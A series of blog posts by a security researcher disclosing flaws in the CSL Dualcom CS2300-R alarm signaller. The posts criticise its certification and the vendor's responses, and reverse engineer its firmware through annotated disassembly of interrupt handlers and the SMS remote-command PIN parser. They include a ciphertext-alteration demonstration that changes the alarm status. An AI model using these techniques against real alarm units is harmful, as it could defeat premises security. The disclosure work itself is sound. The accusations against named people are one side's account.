Encrypted: 2i7MZCNhHRdkZpYTX2fiLMIaEbo02SKe5L3EbPYWRkn
    Shift: 0000000000000000000000000004444444444444440 
  Altered: 2i7MZCNhHRdkZpYTX2fiLMIaEbo46WOi9P7IfT20Von 
Decrypted: 89441012345678901237A1234565555555555555557

By adding four to a character in the encrypted text, we add four to the decrypted character. This means that the message content has been altered significantly, and very easily. The altered part of the message is the alarm status.

I can see no way that these units are compliant with this standard. CSL, however, say they are certified.

5. I do not believe third-party certification is worthwhile

CSL has obtained third-party certification for CS2300 units. When I first heard this, I was astonished – how is it compliant with the standard?

It’s still not actually clear which units have been tested. The certificate says CS2300, my units say CS2300-R, but CSL say that the units I have looked at have been tested.

After meeting with the test house I have an idea of what happened here.

The test house would not discuss the CS2300 certification specifically, due to client confidentiality. They did discuss the EN50136 standard and testing in general.

Firstly, I was not reassured that the test house has the technical ability to test any cryptographic or electronic security aspects of the standard. Their skills do not lie in this area. At a number of points during the meeting I was surprised about their lack of knowledge around cryptography.

Secondly, there are areas of standards where a manufacturer can self-declare that they are compliant. The test house expected, if another unit was to be tested, the sections on encryption and electronic security would be self-declared by the manufacturer. Note that the test house can still scrutinise evidence around a self-declaration.

Thirdly, there is no way for a third-party to see any detail around the testing without both the manufacturer and test house agreeing to release the data. To everyone else, it’s just a certificate.

From this, I can infer that the CS2300 – and probably other signalling devices, even from other manufacturers – have not actually had the encryption or other electronic security tested by a competent third-party.

I don’t feel that this is made clear enough by either manufacturers or test houses.

6. I do not think the standard is strict enough

I acknowledge that the standard must cover a range of devices, of different costs, protecting different risks, and across the EU. It must be a lot of work drawing up such a standard.

Regardless of this, the section on encryption and substitution protection is so wishy-washy that it would be entirely possible to build a compliant device that had gaping security holes in it.

Encryption, by itself, is not enough to maintain the security of a system. This is widely known in the information security and cryptography world. It’s perfectly possible to chain together sound cryptographic primitives into a useless system. There is nothing in the standard to protect against this.

7. CSL do not have a security culture

There are so many issues with the CS2300-R system it is almost unbelievable.

Other aspects of CSL’s information security are also similarly weak; leaking their customer database, no TLS on the first revision of their app, an awful apprenticeship website, no TLS on their own shop, misconfiguration of TLS on their VPN server, letting staff use Hotmail in their network operations centre… it goes on.

(It is worth noting that CSL added TLS to their shop and fixed the VPN server after I blogged about them a few weeks ago – why does it take blog posts before trivially simple issues are fixed?)

CSL do not have a vulnerability disclosure policy. It was clear that CSL did not know how to handle a vulnerability report.

CSL have refused to discuss any detail without a non-disclosure agreement in place.

There is no evidence that CSL’s security has undergone any form of scrutiny. Even a rudimentary half-day assessment would have picked up many of the issues with their website.

There is also a degree of spin in their marketing and sales. A number of installers and ARCs questioned believe that the device forms a VPN to CSL’s server. Some also believe that the device uses AES-256. Indeed, their director of IT, Santosh Chandorkar claimed to me that the CS2300-R formed a VPN with their servers. There is no evidence in the firmware to support any of these claims, but there is also no way for a normal user to confirm what is and isn’t happening.

At a meeting, Rob Evans inferred that it would be my fault should these issues be exploited after I released them. He used the example of someone getting hurt on a premises protected by their devices. It obviously would not the fault of the company that developed the system.

At one point, when raised on a forum, someone claiming to be a family friend of Rob Evans, accused me of hacking his DVR and spying on his kid, whilst at the same time attempting to track me down and make threats of violence. The same person has boasted about this on other forums.

I have asked Rob Evans to confirm or deny if he knows this person. As of today, I have had no response.

Another alarm installer going by the handle of Cubit is repeatedly stating that I am attempting to extort money from security manufacturers:

Not when he tries to hold a company to ransom, no!
Remember reading his article about the (claimed) flaws in the <redacted> product?? No, thought not. They paid to keep him quiet.

Oddly, the MD of the same company came along to state that this wasn’t the case.

I think it’s disturbing that, rather than pay attention to potential issues, defenders of CSL act like this.

And there is this gem from Simon Banks, managing director of CSL Dualcom:

IP requires elaborate encryption because it sends data across the open Internet. In my 25 years’ experience I’ve never been aware of a signalling substitution or ‘hack’, and have never seen the need for advanced 128 bit encryption when it comes to traditional security signalling.

No need for 128 bit encryption, Simon. Only the standard.


The seven issues to take away from this are:

  1. CSL have developed incredibly bad encryption, on a par with techniques state-of-the-art in the time before computers.
  2. CSL have not protected against substitution very well
  3. CSL can’t fix issues when they are found because they can’t update the firmware
  4. There seems to be a big gap between the observed behaviour of the CS2300-R boards and the standards
  5. It’s likely that the test house didn’t actually test the encryption or electronic security
  6. Even if a device adheres to the standard, it could still be full of holes
  7. CSL either lack the skill or drive to develop secure systems, making mistake after mistake

What do I think should happen as a result of this?

  1. All signalling devices should be pen-tested by a competent third-party
  2. A cut-down report should be available to users of the devices, detailing what was tested and the results of the testing
  3. The standards, and the standards testing, needs to include pen-testing rather than compliance testing
  4. The physical security market needs to catch up with the last 10 years of information security


CSL have made some statements about this.

This only impacts a limited number of units

CSL have stated:

Of the product type mentioned in his report there are only around 600 units in the field

What product type mentioned? Units labelled CS2300-R? Speaking to installers, the CS2300-R seems to be incredibly common.

If it is only a subset of units labelled CS2300-R, how does a user work out which ones are impacted?

The other 299,400 devices may not be the same unit, but how do they differ? Has a competent third-party tested the encryption and electronic security?

We have done an internal review

CSL have stated:

Our internal review of the report concluded there is no threat to these systems

Ask yourself this: if someone has deployed a system with this many issues in it, why should you trust their judgement as to the security of the system now? Are they competent to judge? There is no evidence that they are.

They have been third-party tested

CSL have stated, specifically in reference to my report:

As with all our products, this product has been certified as compliant to the required European standard EN-50136

This worries me. This says that the very device I have examined – the one full of security problems – got past EN-50136 testing. If this device can pass, practically anything can pass.

But I am fairly sure that the standards testing essentially allows the manufacturer to complete the exercise on paper alone.

The devices are old

The product tested was a 6 year old GPRS/IP Dualpath signalling

Firstly, there are at least 600 of these still in service.

Secondly, when the research was carried out, the boards were 4.5 years old.

Thirdly, does that mean that a 6 year old product is obsolete? Does that mean they don’t support it any more?

The threat model isn’t the one we are designed for

This testing was conducted in a lab environment that isn’t
representative of the threat model the product is designed to be implemented in
line with.  The Dualpath signalling unit is designed to be used as part of a
physically secured environment with threat actors that would not be targeting
the device but the assets of the device End User.

This seems to have been a sticking point with some of the more backwards members of the security industry as well.

The reverse engineering work was done in a lab. As with nearly all vulnerability research, there needs to be a large initial investment in time and effort. Once vulnerabilities have been found, they can be exploited outside of the lab environment.

If the threat actors aren’t targeting the device, why bother with dual path?

Again, it doesn’t look like the devices comply with the standards. This is what counts.

They aren’t remotely exploitable

No vulnerabilities were identified that could be exploited remotely via
either the PSTN connectivity or GPRS connection which significantly reduces the
impact of the vulnerabilities identified.

I disagree with this. CSL and a number of their supporters do not seem to want to accept that GPRS data can no longer be classed as secure.

This still leaves the gaping holes on the IP side. When I met CSL at IFSEC 2014, they strongly implied that the number of IP units they sold was negligible. There seem to be more than a few getting installed though.

The price point is too low

The price point for the DualCom unit is £200 / $350.  CSL DualCom also
have devices in their portfolio that are tamper resistant or tamper evident to
enable customers to defend against more advanced or better funded threat
actors.  Customers are then able to spend on defence in line with the value of
their assets.

I’m not sure why the price is relevant. Are CSL saying it’s too cheap to be properly secure?

I can’t find any of these tamper resistant or tamper evident devices for sale – it would be interesting to see what they are.

Very few of the issues raised involve physically tampering with the device. They are generally installed in a protected area.

These aren’t problems, but we are releasing a product that fixes the issues

If customers are concerned about the impact of these vulnerabilities CSL are
releasing a new product in May which addresses all of the areas highlighted.

So on one hand, these vulnerabilities aren’t issues, but they are issues enough that you’ve developed a new product to fix them? Righty ho.

Firmware updates are vulnerable, but not normal communications

CSL products are not remotely patchable as we believe over the air updates
could be susceptible to compromise by the very threat actors we are defending


Just a few paragraphs ago, you say that you are not protecting against the kind of threat actor that can carry out attacks as in the report. But you are protecting against a threat actor that can intercept firmware updates?

Why allow critical settings to be changed over SMS if this is an issue?

What-if rebuttals

These are things that haven’t been directly stated by CSL or others, but I suspect that people will raise them

These issues are not being exploited

During discussions with CSL, they seemed very focused on what has happened in the past. I had no evidence of attacks being carried out against their system, and neither did they. Therefore, in their eyes, the vulnerabilities were not an issue.

This is an incredibly backwards view of security. The idea of a botnet of DVRs mining cryptocurrency would have seemed ridiculous 5 years ago. The idea of a worm, infecting routers and fixing security problems even more so. The Internet changes. The attackers change. Knowledge changes.

Failing to keep up with these changes has been the downfall of many systems.

But we haven’t detected any issues

This entirely misses the point.

The end result of these vulnerabilities is that it is highly likely that a skilled attacker could spoof another device undetected.

We don’t mind issues being brought to us privately

These issues were brought to CSL’s attention, privately, 17 months ago.

That is ample time to act.

He works for a competitor

Firstly, I don’t. I have spoken to competitors to find out how they work.

Secondly, this would not detract from the glaring holes in the system.

He is blackmailing people in the security industry

I have released vulnerabilities in Visonic and Risco products. Shortly, there will be a vulnerability in the RSI Videofied systems. None of these people have been asked for payment and have been given 45+ days to respond to issues. This is a fair way of disclosing issues.

I do paid work with others in the security industry. Again, at no point has payment been requested to keep issues quiet.

I have never asked CSL for payment. At several points they have asked to work with me, which I have turned down as I don’t think their security problems are going to be resolved given their culture.

The encryption and electronic security are adequate

It’s hard to explain (to someone outside of infosec) just how bad the encryption is. It is orders of magnitude less strong than encryption used by Netscape Navigator in 2001.

The problems found have been widely known for 20+ years, and many are easy to protect against. Importantly, it appears that their competitors – at least WebWayOne and BT Redcare – aren’t making the same mistakes.

The GPRS network is secure

This was true 15 years ago. It is now possible – cheaply and easily – to spoof a cell site and then intercept GPRS communications. You cannot rely on the security of the GRPS network alone.

Further to this, exactly the same protocol is used over the Internet.

But above all, the standards don’t differentiate between GPRS and the Internet – they are both packet switched networks and must be secured similarly.

We take our customers security seriously

So does every other company that has been the subject of criticism around security.

I would argue that letting your customer database leak is not taking security seriously.

Reverse engineering a CSL Dualcom GPRS part 16 – SMS remote commands

Sorry for the slow-down in posts – I stored up a load of posts, then posted them too quickly.

Since the last post, I have identified a lot of functionality in the code, including:

  • TX/RX subs for all the UARTS
  • Locations of TX/RX buffers for all UARTS
  • Multiply, divide, modulus and exponent subs
  • Conversion subs (ASCII->hex etc.)
  • EEPROM read/write subs
  • 7 segment display subs
  • Buzzer subs
  • Reading button state
  • Memory copy, search etc.
  • Hardware initilisation
  • Two intetesting subs that are called frequently to move working memory onto stack and back again

The board supports several GPRS modems – the Wavecom GR64 on the boards I have, but also Cinterion and Telit. The AT command set between the modems is completely different, so there are often several sections of code for common functionality like “Activate PDP context”. I’ve only looked at the Wavecom parts.

Having all this has given me enough to tie observed behaviour (just from using the Dualcom board, and the logic traces) back to specific areas of the code. Seeing the strings on the UART and searching for the address where that string is stored in flash/EEPROM is very useful.

I’m fairly sure the code is compiled C from IAR Embedded Workbench – the multiply, divide and startup are identical. If I compile code from Renesas Cubesuite, it looks very different.

There is still a lot of code that looks like assembly though – some of the memory operations, calling convention, and string searching look very odd to be compiled C.

One thing that caught my eye during the serial trace was that the board repeatedly checks for SMS messages. This suggests it is waiting for something to arrive, possibly commands

Digging around a bit, in the manual for the Dualcom GSM (not the GPRS), it mentions SMS remote control – sending commands to the CSL Dualcom:

SMS Remote commands

SMS Remote commands

This is interesting. A 6 digit PIN and some limited commands. It wouldn’t be the first time that PINs are defaulted to a certain value or derived from open information like the ICCID or number. It also wouldn’t be the first time that there are undocumented or hidden commands for a device, or even a backdoor.

We’re going to need to have a dig about in the code to see how these commands are dealt with. A good starting point would be to find where the string AT+CMGR (read text messages) is used, and follow on from there.

AT+CMGR is stored in the flash at 0x1BE6 (0x1000-0x2000 is almost exclusively strings and lookup tables). If we search for this address, we find the following chunk:

// State 0x86
// Request text messages
0c657        afc8f5      MOVW            AX,!0F5C8H // This is used as a time out
0c65a        7c80        XOR             A,#80H
0c65c        440180      CMPW            AX,#8001H
0c65f        dc07        BC              $0C668H
	0c661        d46a        CMP0            0FFE6AH
	0c663        61f8        SKNZ            
	0c665        ee3902      BR              $!0C8A1H
0c668        e1          ONEB            A
0c669        fc64d700    CALL            sub_Serial_ResetBuffers
0c66d        32b61e      MOVW            BC,#1EB6H // AT+CMGR=
0c670        e1          ONEB            A
0c671        fcd1e100    CALL            sub_Serial_WriteString_e1d1
0c675        8f49f7      MOV             A,!0F749H
0c678        72          MOV             C,A
0c679        f3          CLRB            B
0c67a        e1          ONEB            A
0c67b        fc04e200    CALL            sub_Serial_WriteHexAsDec_e204
0c67f        f46b        CLRB            0FFE6BH
0c681        f46a        CLRB            0FFE6AH
0c683        cf41f704    MOV             !0F741H,#4H
0c687        530d        MOV             B,#0DH //CR
0c689        e1          ONEB            A
0c68a        fcb2e100    CALL            sub_Serial_WriteChar_e1b3
0c68e        30a302      MOVW            AX,#2A3H
0c691        bfc8f5      MOVW            !0F5C8H,AX // set timeout to 675
0c694        cf4af704    MOV             !0F74AH,#4H // State 4 next
0c698        ee0602      BR              $!0C8A1H

This is a massive state machine. The “state” is stored in 0xF74A, checked at the beginning of the sub and then a branch performed to the current state.. State 0x86 sends “AT+CMGR=1” to UART1. It then sets the next state to 0x4.

Each one of the states sets a counter in 0xFF5C8 which is decremented in the timer interrupt. If this is hit, the state machine seems to be reset in most cases.

// State 0x4
// State after requesting text messages
0c69b        afc8f5      MOVW            AX,!0F5C8H // timeout
0c69e        7c80        XOR             A,#80H
0c6a0        440180      CMPW            AX,#8001H
0c6a3        dc42        BC              $0C6E7H
	0c6a5        8f19f7      MOV             A,!0F719H
	0c6a8        4c02        CMP             A,#2H
	0c6aa        61d8        SKNC            
	0c6ac        eef201      BR              $!0C8A1H
	0c6af        32c01e      MOVW            BC,#1EC0H  // "REC "
	0c6b2        e1          ONEB            A
	0c6b3        fcd3de00    CALL            sub_Serial_FindInRX_ded3
	0c6b7        d1          CMP0            A
	0c6b8        dd0d        BZ              $0C6C7H
	0c6ba        30a302      MOVW            AX,#2A3H
	0c6bd        bfc8f5      MOVW            !0F5C8H,AX
	0c6c0        cf4af718    MOV             !0F74AH,#18H // State 0x18 next
	0c6c4        eeda01      BR              $!0C8A1H

	0c6c7        32c61e      MOVW            BC,#1EC6H // "STO "
	0c6ca        e1          ONEB            A
	0c6cb        fcd3de00    CALL            sub_Serial_FindInRX_ded3
	0c6cf        d1          CMP0            A
	0c6d0        dd07        BZ              $0C6D9H
	0c6d2        cf4af717    MOV             !0F74AH,#17H // State 0x17 next
	0c6d6        eec801      BR              $!0C8A1H

	0c6d9        3152410a    BT              0FFE41H.5H,$0C6E7H
	0c6dd        afdef5      MOVW            AX,!0F5DEH
	0c6e0        7c80        XOR             A,#80H
	0c6e2        440180      CMPW            AX,#8001H
	0c6e5        dc0b        BC              $0C6F2H
0c6e7        cf49f70f    MOV             !0F749H,#0FH
0c6eb        cf4af796    MOV             !0F74AH,#96H // State 0x96 next
0c6ef        eeaf01      BR              $!0C8A1H

State 0x4 searches the receive buffer on UART1 for the characters “REC” or “STO”. “REC” is what we would see if there was a text message to read, and if this is found we move to stat 0x18. This calls 0xC301 and the flow continues from there. It might be better to describe this as a process rather than show ASM.

The format of the text message received would be as follows:

+CMGR: “REC UNREAD”,“+447747008670”,“Matt L”,“02/11/19,09:57:28+00”,145,36,0,0,“ +447785016005”,145,8

Test sms

The code, give or take, works as follows.

1. Search RX buffer for string READ – this finds REC UNREAD and REC READ, both found in text messages. If not found, abort.

2. Keep on going until a + is found – the start of the phone number

3. Loop until a non-numeric character is found, storing the number in 0xFE17F. The number is used later to send a text back.

4. Loop until a carriage return is found. This is the end of the text detail and the start of the actual text.

5. Copy the message to address 0xFE20E.

6. Read in a 6-digit PIN from EEPROM at 0x724. I can’t see where this is set in the Windows utility.

7. Check that the 6-digit PIN is at the beginning of the message.

8. Call a function to parse the rest of the message and act on it.

This is where it gets mildly interesting – not only are there the documented commands but there are ones that include “CALL” and “4 2 xxxxxxxxxx”….

Reverse engineering a CSL Dualcom GPRS part 15 – interpreting disassembly 2

In addition to finding the most frequently called functions, we should go through the memory map and identify importants parts of it.

1154 memory map

One part of this that is very important to how the device operates is the vector table, right at the bottom of the flash.

The vector table contains addresses that are called when certain interrupts are triggered. For these microcontrollers, this is structured like this:
Vector table

So we take a look right at the beginning of the disassembly:

00000        00          NOP             
00001        01          ADDW            AX,AX
00002        82          INC             C
00003        2084        SUBW            SP,#84H
00005        2086        SUBW            SP,#86H
00007        2088        SUBW            SP,#88H
00009        208a        SUBW            SP,#8AH
0000b        208c        SUBW            SP,#8CH
0000d        208e        SUBW            SP,#8EH
0000f        2090        SUBW            SP,#90H
00011        2092        SUBW            SP,#92H
00013        2001        SUBW            SP,#1H
00015        247d23      SUBW            AX,#237DH
00018        292494      MOV             A,9424H[C]
0001b        2096        SUBW            SP,#96H
0001d        203a        SUBW            SP,#3AH
0001f        21          ?               
00020        be20        MOVW            PM0,AX
00022        3c21        SUBC            A,#21H
00024        92          DEC             C
00025        225921      SUBW            AX,!2159H
00028        ba22        MOVW            [DE+22H],AX
0002a        9820        MOV             [SP+20H],A
0002c        00          NOP             
0002d        209a        SUBW            SP,#9AH
0002f        209c        SUBW            SP,#9CH
00031        209e        SUBW            SP,#9EH
00033        20a0        SUBW            SP,#0A0H
00035        20a2        SUBW            SP,#0A2H
00037        20a4        SUBW            SP,#0A4H
00039        20a6        SUBW            SP,#0A6H
0003b        205e        SUBW            SP,#5EH
0003d        23          SUBW            AX,BC
0003e        d7          RET             
0003f        226023      SUBW            AX,!2360H
00042        a820        MOVW            AX,[SP+20H]
00044        aa20        MOVW            AX,[DE+20H]
00046        ac20        MOVW            AX,[HL+20H]
00048        ae20        MOVW            AX,PM0
0004a        b020b2      DEC             !0B220H
0004d        20b4        SUBW            SP,#0B4H
0004f        20b6        SUBW            SP,#0B6H
00051        20b8        SUBW            SP,#0B8H
00053        20ba        SUBW            SP,#0BAH
00055        20ff        SUBW            SP,#0FFH

The disassembler has tried to disassemble when it shouldn’t – a common issue. Though, to be honest, it should know that this area is a vector table.

So if we re-organise the hex file into something a bit more readable, we get this:

0000 -> 0100 * RESET
0004 -> 2082
0006 -> 2086
0008 -> 2088
000A -> 208A
000C -> 208C
000E -> 208E
0010 -> 2090
0012 -> 2092
0014 -> 2401 * INTST3
0016 -> 237D * INTSR3
0018 -> 2429 * INTSRE3
001A -> 2094 
001C -> 2096 
001E -> 213A * INST0 
0020 -> 20BE * INTSR0 
0022 -> 213C * INTSRE0
0024 -> 2292 * INTST1
0026 -> 2159 * INTSR1
0028 -> 22BA * INTSRE1
002A -> 2098
002C -> 2000 * INTTM00
002E -> 209A
0030 -> 209C
0032 -> 209E
0034 -> 20A0
0036 -> 20A2
0038 -> 20A4
003A -> 20A6
003C -> 235E * INTST2
003E -> 22D7 * INTSR2
0040 -> 2360 * INTSRE2
0042 -> 20A8
0044 -> 20AA
0046 -> 20AC
0048 -> 20AE
004A -> 20B0
004C -> 20B2
004E -> 20B4
0050 -> 20B6
0052 -> 20B8
0054 -> 20BA

Notice how a lot of the addresses are just incrementing- 20AA, 20AC, 20AE. This is just a massive block of RETI instructions – i.e. the interrupt handler just returns immediately – it is not implemented.

02092        61fc        RETI            
02094        61fc        RETI            
02096        61fc        RETI            
02098        61fc        RETI            
0209a        61fc        RETI            
0209c        61fc        RETI            
0209e        61fc        RETI            
020a0        61fc        RETI            
020a2        61fc        RETI            
020a4        61fc        RETI            
020a6        61fc        RETI            
020a8        61fc        RETI            
020aa        61fc        RETI            
020ac        61fc        RETI            
020ae        61fc        RETI            
020b0        61fc        RETI            
020b2        61fc        RETI     

All of the vectors that are marked with an asterisk and with a name are implemented or used by the board. There are some important handlers here – mainly the serial IO.

Reset jumps to 0x100. I’ll save looking at that for another time – mostly the reset vector will be setting up buffers, memory, pointers, some checks.

You can also see we have groups of interrupt handlers for INTST* (transmit finished), INTSR* (receive finished), INTSRE* (receive error). These are for the the UARTs 0-3 respectively. Their implementation is very similar – let’s look at UART1 which is used for the GPRS modem.

	02292        c1          PUSH            AX
	02293        c3          PUSH            BC
	02294        c7          PUSH            HL
		02295        fbb6e0      MOVW            HL,!0E0B6H
		02298        afb4e0      MOVW            AX,!0E0B4H
		0229b        47          CMPW            AX,HL
		0229c        dd17        BZ              $22B5H
		0229e        dbb4e0      MOVW            BC,!0E0B4H
		022a1        49b8e4      MOV             A,0E4B8H[BC] 	// Get data from E4B8 using offset from E0B4
		022a4        9e44        MOV             SIO10,A 		// Move to serial data TX register
		022a6        a2b4e0      INCW            !0E0B4H	    // Increment the offset
		022a9        afb4e0      MOVW            AX,!0E0B4H
		022ac        440a04      CMPW            AX,#40AH 		// Is the offset greater than 1034? If so reset to 0
		022af        dc04        BC              $22B5H
		022b1        f6          CLRW            AX
		022b2        bfb4e0      MOVW            !0E0B4H,AX
	022b5        c6          POP             HL
	022b6        c2          POP             BC
	022b7        c0          POP             AX
	022b8        61fc        RETI  

Again – I’m not really currently interested in precise detail, just an idea of what is happening. This handler takes a byte from a buffer at 0xE4B8 and writes it into the transmit register. That buffer will appear elsewhere in the code and hint to us when something is being sent out of UART1.

We can then go through all of the other UART/serial functions and identify potential transmit/receive buffers.

Interestingly, INTST0 and INTST2 are just RETI instructions. Why do these not require a transmit empty interrupt handler? Is it handled in software elsewhere?

The next handler that stands out from the others is INTTM00. This is the timer interrupt for timer 0 which will fire when the timer hits a certain value.

// INTTM00        
	02000        c1          PUSH            AX
	02001        c3          PUSH            BC
	02002        c7          PUSH            HL
	02003        aefc        MOVW            AX,0FFFFCH
	02005        c1          PUSH            AX
	02006        a0b3f6      INC             !0F6B3H
	02009        8fb3f6      MOV             A,!0F6B3H
	0200c        5c03        AND             A,#3H
	0200e        4c03        CMP             A,#3H
	02010        df38        BNZ             $204AH
		02012        a0b4f6      INC             !0F6B4H
		02015        fcfc2801    CALL            !!128FCH
		02019        fc932601    CALL            !!12693H
		0201d        fcf22701    CALL            !!127F2H
		02021        f45c        CLRB            0FFE5CH

		02023        fc132a01    CALL            !!12A13H // 7SEG display
		02027        fcaa3201    CALL            !!132AAH // Buttons

		0202b        8fb4f6      MOV             A,!0F6B4H
		0202e        5c03        AND             A,#3H
		02030        dd08        BZ              $203AH
		02032        91          DEC             A
		02033        dd0b        BZ              $2040H
		02035        91          DEC             A
		02036        dd0e        BZ              $2046H
		02038        ef10        BR              $204AH
		0203a        fccbff00    CALL            !!0FFCBH // Analog
		0203e        ef0a        BR              $204AH
		02040        fcd13101    CALL            !!131D1H
		02044        ef04        BR              $204AH
		02046        fc063301    CALL            !!13306H
	0204a        fc742e01    CALL            !!12E74H
	0204e        fc84ff00    CALL            !!0FF84H
	02052        72          MOV             C,A
	02053        81          INC             A
	02054        dd24        BZ              $207AH
        02056        62          MOV             A,C
        02057        70          MOV             X,A
        02058        f1          CLRB            A
        02059        01          ADDW            AX,AX
        0205a        04b8f5      ADDW            AX,#0F5B8H
        0205d        16          MOVW            HL,AX
        0205e        f6          CLRW            AX
        0205f        b1          DECW            AX
        02060        bb          MOVW            [HL],AX
        02061        62          MOV             A,C
        02062        d1          CMP0            A
        02063        dd11        BZ              $2076H
        02065        2c11        SUB             A,#11H
        02067        dd05        BZ              $206EH
        02069        91          DEC             A
        0206a        dd06        BZ              $2072H
        0206c        ef0c        BR              $207AH
        0206e        e46a        ONEB            0FFE6AH
        02070        ef08        BR              $207AH
        02072        e46b        ONEB            0FFE6BH
        02074        ef04        BR              $207AH
        02076        fcf7fc00    CALL            !!0FCF7H
        0207a        c0          POP             AX
	0207b        befc        MOVW            0FFFFCH,AX
	0207d        c6          POP             HL
	0207e        c2          POP             BC
	0207f        c0          POP             AX

This looks like it is fired periodically. A number of counters are used so that portions of the subroutine are only run now and then.

There are a lot of calls, and if we look to them we can clearly identify function:

// Suspect from IO this is output to 7 seg
	12a13        d45d        CMP0            0FFE5DH
	12a15        f1          CLRB            A
	12a16        61f8        SKNZ            
	12a18        e1          ONEB            A
	12a19        9d5d        MOV             0FFE5DH,A
	12a1b        d45d        CMP0            0FFE5DH
	12a1d        dd24        BZ              $12A43H
	12a1f        8f46f6      MOV             A,!0F646H
	12a22        d448        CMP0            0FFE48H
	12a24        dd0a        BZ              $12A30H
	12a26        36b4f6      MOVW            HL,#0F6B4H
	12a29        31d50e      BF              [HL].5H,$12A3AH
	12a2c        51ff        MOV             A,#0FFH
	12a2e        ef0a        BR              $12A3AH
	12a30        d446        CMP0            0FFE46H
	12a32        dd06        BZ              $12A3AH
	12a34        36b4f6      MOVW            HL,#0F6B4H
	12a37        31f3f2      BT              [HL].7H,$12A2CH
	12a3a        712305      CLR1            P5.2H // These are the common cathodes
	12a3d        713205      SET1            P5.3H
	12a40        9d06        MOV             P6,A // P6 is the 7SEG
	12a42        d7          RET       

	12a43        8f47f6      MOV             A,!0F647H
	12a46        d449        CMP0            0FFE49H
	12a48        dd0a        BZ              $12A54H
	12a4a        36b4f6      MOVW            HL,#0F6B4H
	12a4d        31d50e      BF              [HL].5H,$12A5EH
	12a50        51ff        MOV             A,#0FFH
	12a52        ef0a        BR              $12A5EH
	12a54        d447        CMP0            0FFE47H
	12a56        dd06        BZ              $12A5EH
	12a58        36b4f6      MOVW            HL,#0F6B4H
	12a5b        31f3f2      BT              [HL].7H,$12A50H
	12a5e        712205      SET1            P5.2H // common cathodes flip
	12a61        713305      CLR1            P5.3H
	12a64        9d06        MOV             P6,A
	12a66        d7          RET   

From the IO, we can see this is likely to be updating the 7 segment LED displays.

The method used – of setting one common cathode, then the segments for that half, then the other common cathode, then the segments for that half – means that this needs to be called relatively frequently otherwise flicker will be detected by the eye.

// Button detection and debounce?
	132aa        31220217    BT              P2.2H,$132C5H // Button A
		132ae        4029e0ff    CMP             !0E029H,#0FFH
		132b2        dd24        BZ              $132D8H
		132b4        a029e0      INC             !0E029H
		132b7        4029e007    CMP             !0E029H,#7H
		132bb        df1b        BNZ             $132D8H
		132bd        cf29e0ff    MOV             !0E029H,#0FFH
		132c1        e445        ONEB            0FFE45H
		132c3        ef13        BR              $132D8H
	132c5        d529e0      CMP0            !0E029H
	132c8        dd0e        BZ              $132D8H
	132ca        b029e0      DEC             !0E029H
	132cd        4029e0f8    CMP             !0E029H,#0F8H
	132d1        df05        BNZ             $132D8H
	132d3        f529e0      CLRB            !0E029H
	132d6        f445        CLRB            0FFE45H

	132d8        31320216    BT              P2.3H,$132F2H // Button B
		132dc        402ae0ff    CMP             !0E02AH,#0FFH
		132e0        dd23        BZ              $13305H
		132e2        a02ae0      INC             !0E02AH
		132e5        402ae007    CMP             !0E02AH,#7H
		132e9        df1a        BNZ             $13305H
		132eb        cf2ae0ff    MOV             !0E02AH,#0FFH
		132ef        e444        ONEB            0FFE44H
		132f1        d7          RET             
	132f2        d52ae0      CMP0            !0E02AH
	132f5        dd0e        BZ              $13305H
	132f7        b02ae0      DEC             !0E02AH
	132fa        402ae0f8    CMP             !0E02AH,#0F8H
	132fe        df05        BNZ             $13305H
	13300        f52ae0      CLRB            !0E02AH
	13303        f444        CLRB            0FFE44H
	13305        d7          RET 

Again, from the IO, we can see that the buttons are being polled. There’s also some counters changing – probably some debounce.

// Analog something or other
	0ffcb        f1          CLRB            A
	0ffcc        71042a      MOV1            CY,0FFE2AH.0H
	0ffcf        7189        MOV1            A.0H,CY
	0ffd1        70          MOV             X,A
	0ffd2        f1          CLRB            A
	0ffd3        710ce3      MOV1            CY,ADIF
	0ffd6        61dc        ROLC            A,1
	0ffd8        6158        AND             A,X
	0ffda        dd23        BZ              $0FFFFH
	0ffdc        710be3      CLR1            ADIF
	0ffdf        4031ff07    CMP             !ADS,#7H
	0ffe3        8d1f        MOV             A,ADCRH
	0ffe5        df0b        BNZ             $0FFF2H
	0ffe7        9f0af6      MOV             !0F60AH,A
	0ffea        717b30      CLR1            ADCS
	0ffed        ce3106      MOV             ADS,#6H
	0fff0        ef09        BR              $0FFFBH
	0fff2        9f0bf6      MOV             !0F60BH,A
	0fff5        717b30      CLR1            ADCS
	0fff8        ce3107      MOV             ADS,#7H
	0fffb        00          NOP             
	0fffc        717a30      SET1            ADCS
	0ffff        d7          RET     

This does something with one of the ADC inputs. I’ve not seen anything of interest that uses analog yet, so I’ll not look into this more currently. It could be the input voltage (the boare can alarm on this) or PSTN line voltage.

There aren’t many other clearly idenfiable subroutines, but these few clearly identifiable ones give me confidence that this interrupt handler is most handling periodic IO.

This program structure of calling time-sensitive IO using a timer interrupt is fairly common in embedded systems. It means that IO is serviced regularly, allowing more time consuming (or non deterministic time) processing to happen outside of the interrupt in the main code. It means there are a lot of buffers and global variables to pass data back and forth that we can look at and play with.

From a security perspective, it can also produce problems. If we can stall something in the timer interrupt – by buffer overflow, bad input or so on – it can be possile to lock up a device. I’d hope that the board used a watchdog timer to recover from this though.